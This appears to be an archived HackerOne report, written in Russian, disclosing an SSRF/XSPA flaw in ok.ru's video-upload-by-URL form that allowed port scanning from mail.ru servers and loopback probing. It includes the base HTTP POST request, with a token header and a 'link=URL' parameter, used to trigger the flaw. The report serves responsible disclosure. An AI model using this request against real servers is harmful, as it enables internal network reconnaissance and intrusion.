ok.ru: SSRF/XSPA в форме загрузки видео по URL

2015-07-22T15:18:37
ID H1:77817
Type hackerone
Reporter alpha
Modified 2016-02-17T16:56:23

Description

Недостаточная фильтрация URL и отсутствие ограничений по количеству запросов в форме загрузки видео по ссылке позволяет выполнить атаку SSRF типа XSPA, сканирование удаленных портов от серверов mail.ru (например, photo55.mail.ru), сканирование loopback и т.д.

Базовый запрос: ``` POST /dk?cmd=videoCommand&a=grabMovie HTTP/1.1 Host: ok.ru User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 TKN: dFrdkb3Y0AiaauwIqGQ4sCyHgrQsROiT X-Requested-With: XMLHttpRequest Referer: http://ok.ru/video/top Content-Length: 38 Cookie: COOKIES

link=URL ```